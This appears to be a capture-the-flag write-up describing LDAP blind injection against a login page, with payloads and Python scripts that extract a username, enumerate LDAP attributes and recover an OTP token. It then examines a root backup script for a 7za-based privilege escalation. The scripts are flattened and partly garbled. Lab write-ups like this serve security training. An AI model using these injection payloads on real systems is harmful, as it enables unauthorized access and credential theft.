The site is protected against bruteforcing which means automated tools are not an efficient option. Looking at /login.php:
Page Source (/login.php):
<form action="/login.php" method="post">
<div class="form-group row">
<div class="col-sm-10">
<div class="form-group row">
<label for="inputUsername" class="col-sm-2 col-form-label">Username</label>
<div class="col-sm-10">
<input type="text" class="form-control" id="inputUsename" name="inputUsername" placeholder="Username">
<div class="form-group row">
<label for="inputOTP" class="col-sm-2 col-form-label">OTP</label>
<div class="col-sm-10">
<input type="OTP" class="form-control" id="inputOTP" name="inputOTP" placeholder="One Time Password">
<!-- we'll change the schema in the next phase of the project (if and only if we will pass the VA/PT) -->
<!-- at the moment we have choosen an already existing attribute in order to store the token string (81 digits) -->
<div class="form-group row">
<div class="col-sm-10">
<button type="submit" class="btn btn-primary name=" submit"="" value="Login">Login</button>
An error message pops up when guessing the Username input:
<div class="col-sm-10">User test not found</div>
Now, testing for possible injection -- inputUsername=%3D (%3D is "=") and no error message popped up.
!, &, *, (, ), \, |, <, and > also doesn't return an error message
These are special characters in LDAP so maybe these characters are being filtered out by /login.php. It is also important to note that a token string for the OTP is stored in a pre-existing attribute so the login might actually be validated using LDAP.
3.1 LDAP Blind Injection
Attempt exploitation using LDAP Injectionusing a wildcard "*" as a payload:
The following response was given by the server:
<div class="col-sm-10">Cannot login</div>
This error message means we have a valid username and that the injection has worked. Now attempting to extract a real valid user using python:
import requests as rimport urllib.parse as uusername =""char_list ="abcdefghijklmnopqrstuvwxyz0123456789"whileTrue:for i inrange(0, len(char_list)): ldap_injection ="%s%c*"% (username, char_list[i]) data ={"inputUsername": u.quote(ldap_injection)} req ="", data=data)if"Cannot login"in req.text: username = username + char_list[i]print(username)breakif i ==len(char_list)-1:breakprint("[x] THE USERNAME IS "+ username)
Run using python3 and a user, ldapuser, has been extracted:
lldldaldapldapuldapusldapuseldapuser[x] THE USERNAME IS ldapuser
Now finding all available/usable LDAP Attributes using ldap_attribute_list.txt (copied from ldap-brute from GitHub):
import requests as rimport urllib.parse as uattribute_list =open("/usr/share/wordlists/ldap_attribute_names.txt", "r")attributes = []for i in attribute_list: ldap_injection ="ldapuser))(&(%s=*"% (i[:-1]) data ={"inputUsername": u.quote(ldap_injection)} req ="", data=data)if"Cannot login"in req.text:print(ldap_injection) attributes.append(i[:-1])attribute_list.close()
Run using python3 and the following were returned -- userPassword, pager, and objectClass might be of interest:
Octet string matching rules are very simple rules that perform byte-by-byte comparisons of octet string
values. All capitalization and spacing is considered significant.
So with ldapuser))(&(uid=ldapuser)(userPassword:, a simple wildcard comparison won't do:
octetStringOrderingMatch (OID An ordering matching rule that will perform a bit-by-bit
comparison (in big endian ordering) of two octet string values until a difference is found. The first
case in which a zero bit is found in one value but a one bit is found in another will cause the value
with the zero bit to be considered less than the value with the one bit.
A sha512crypt hash was extracted but this seems to be a RABBIT HOLE. But the pager attribute seems promising:
import requests as rimport urllib.parse as utoken =""while( len(token)!=81 ):for i inrange(0,10): ldap_injection ="ldapuser))(&(pager=%s%d*"% (token, i) data ={"inputUsername": u.quote(ldap_injection)} req ="", data=data)if"Cannot login"in req.text: token = token +str(i)print(token)breakprint("[x] THE TOKEN IS "+ token)
Run using python3 and it seems like the attribute contains the token which is a Pure Numeric CTF (Compressed Token Format) string:
Integer Matching
integerMatch (OID An equality matching rule that will consider two integer values
equivalent if they represent the same number.
Using the new username, The group restriction no longer applies.
There is a script named and backup files seem to be generated every minute:
# get banned ips from fail2ban jails and update banned.txt# banned ips directily via firewalld permanet rules are **not** included in the list (they get kicked for only 10 seconds)/usr/sbin/ipsetlist|grepfail2ban-A7|grep-E'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'|sort-u>/var/www/html/banned.txt# awk '$1=$1' ORS='<br>' /var/www/html/banned.txt > /var/www/html/testfile.tmp && mv /var/www/html/testfile.tmp /var/www/html/banned.txt# some vars in order to be sure that backups are protectednow=$(date+"%s")filename="backup.$now"pass=$(opensslpasswd-1-salt0xEA31-in/root/root.txt|md5sum|awk'{print $1}')# keep only last 10 backupscd/backupls-1t*.zip|tail-n+11|xargsrm-f# get the files from the honeypot and backup 'em allcd/var/www/html/uploads7zaa/backup/$$pass--*# cleaup the honeypotrm-rf--*# comment the next line to get errors for debuggingtruncate-s0/backup/error.log
Breakdown of
Keeps a maximum of 10 most recent backups in /backup.
Backs everything up in /var/www/html/uploads
The backups are password-protected and running pspy doesn't show when 7za is run which means that the password can't be intercepted.
The -- switch protects 7za from wildcard injection.
Everything in /var/www/html/uploads are deleted after backup.
Errors generated (maybe) are deleted after everything
5.2 7za listfiles
Leveraging by exploiting what 7za can do: